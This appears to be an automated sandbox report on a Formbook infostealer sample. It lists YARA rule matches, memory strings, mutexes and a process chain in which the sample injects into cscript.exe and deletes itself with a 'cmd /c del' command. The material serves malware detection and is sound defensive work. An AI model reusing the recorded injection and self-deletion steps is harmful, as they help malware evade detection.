          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C28C07_2_051C28C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_052718DA7_2_052718DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051FDB197_2_051FDB19
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527FB2E7_2_0527FB2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051C0B107_2_051C0B10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_05234BC07_2_05234BC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527CA137_2_0527CA13
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527EA5B7_2_0527EA5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0527FA897_2_0527FA89
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051DFAA07_2_051DFAA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301D5A67_2_0301D5A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301E5AF7_2_0301E5AF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301E8217_2_0301E821
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_03002FB07_2_03002FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_03009E607_2_03009E60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301ED6C7_2_0301ED6C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_03002D877_2_03002D87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_03002D907_2_03002D90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: String function: 0187E692 appears 81 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: String function: 017FB910 appears 251 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: String function: 01845050 appears 36 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: String function: 01857BE4 appears 88 times
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: String function: 0188EF10 appears 105 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 051F5050 appears 36 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 051AB910 appears 268 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0523EF10 appears 105 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 05207BE4 appears 91 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0522E692 appears 86 times
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163819035.0000000000B28000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameBEvO.exe. vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32570984939.00000000074F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32566392744.0000000002FD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000003.00000002.32570359930.0000000006BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000018FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exeBinary or memory string: OriginalFilenameBEvO.exe. vs yPURXYpFVuXra2o.exe
          Source: yPURXYpFVuXra2o.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cscript.exe PID: 4960, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: yPURXYpFVuXra2o.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: explorer.exe, 00000006.00000003.31963280084.000000000C715000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C680000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C698000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ;.VBpoq
          Source: classification engineClassification label: mal100.troj.evad.winEXE@520/1@23/2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,7_2_0040BCDF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_004064E0 CLSIDFromString,CoCreateInstance,7_2_004064E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_004182B5 FindResourceExW,LoadResource,7_2_004182B5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yPURXYpFVuXra2o.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMutant created: NULL
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: yPURXYpFVuXra2o.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: yPURXYpFVuXra2o.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Ventas] ([IdCliente], [IdEmpleado], [Documento], [Serie], [Nro], [Subtotal], [IGV], [Total]) VALUES (@IdCliente, @IdEmpleado, @Documento, @Serie, @Nro, @Subtotal, @IGV, @Total);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Detalles] ([IdVenta], [IdProducto], [Cantidad], [Precio]) VALUES (@IdVenta, @IdProducto, @Cantidad, @Precio);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Producto] ([Descripcion], [Precio], [Marca]) VALUES (@Descripcion, @Precio, @Marca);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Producto] SET [Descripcion] = @Descripcion, [Precio] = @Precio, [Marca] = @Marca WHERE (([IdProducto] = @Original_IdProducto) AND ([Descripcion] = @Original_Descripcion) AND ([Precio] = @Original_Precio) AND ((@IsNull_Marca = 1 AND [Marca] IS NULL) OR ([Marca] = @Original_Marca)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Cliente] SET [Nombres] = @Nombres, [Apellidos] = @Apellidos, [DNI] = @DNI, [Direccion] = @Direccion, [Telefono] = @Telefono WHERE (([IdCliente] = @Original_IdCliente) AND ([Nombres] = @Original_Nombres) AND ([Apellidos] = @Original_Apellidos) AND ((@IsNull_DNI = 1 AND [DNI] IS NULL) OR ([DNI] = @Original_DNI)) AND ((@IsNull_Direccion = 1 AND [Direccion] IS NULL) OR ([Direccion] = @Original_Direccion)) AND ((@IsNull_Telefono = 1 AND [Telefono] IS NULL) OR ([Telefono] = @Original_Telefono)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Detalles] SET [IdVenta] = @IdVenta, [IdProducto] = @IdProducto, [Cantidad] = @Cantidad, [Precio] = @Precio WHERE (([IdVenta] = @Original_IdVenta) AND ([IdProducto] = @Original_IdProducto) AND ([Cantidad] = @Original_Cantidad) AND ([Precio] = @Original_Precio));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Cliente] ([Nombres], [Apellidos], [DNI], [Direccion], [Telefono]) VALUES (@Nombres, @Apellidos, @DNI, @Direccion, @Telefono);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Empleadoo] SET [Nombre] = @Nombre, [Apellidos] = @Apellidos, [DNI] = @DNI, [Direccion] = @Direccion, [Telefono] = @Telefono WHERE (([IdEmpleado] = @Original_IdEmpleado) AND ([Nombre] = @Original_Nombre) AND ([Apellidos] = @Original_Apellidos) AND ((@IsNull_DNI = 1 AND [DNI] IS NULL) OR ([DNI] = @Original_DNI)) AND ((@IsNull_Direccion = 1 AND [Direccion] IS NULL) OR ([Direccion] = @Original_Direccion)) AND ((@IsNull_Telefono = 1 AND [Telefono] IS NULL) OR ([Telefono] = @Original_Telefono)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Ventas] SET [IdCliente] = @IdCliente, [IdEmpleado] = @IdEmpleado, [Documento] = @Documento, [Serie] = @Serie, [Nro] = @Nro, [Subtotal] = @Subtotal, [IGV] = @IGV, [Total] = @Total WHERE (([IdVentas] = @Original_IdVentas) AND ([IdCliente] = @Original_IdCliente) AND ([IdEmpleado] = @Original_IdEmpleado) AND ([Documento] = @Original_Documento) AND ([Serie] = @Original_Serie) AND ([Nro] = @Original_Nro) AND ([Subtotal] = @Original_Subtotal) AND ([IGV] = @Original_IGV) AND ([Total] = @Original_Total));
          Source: yPURXYpFVuXra2o.exeReversingLabs: Detection: 31%
          Source: yPURXYpFVuXra2o.exeVirustotal: Detection: 34%
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeFile read: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: windows.storage.dllJump to behavior
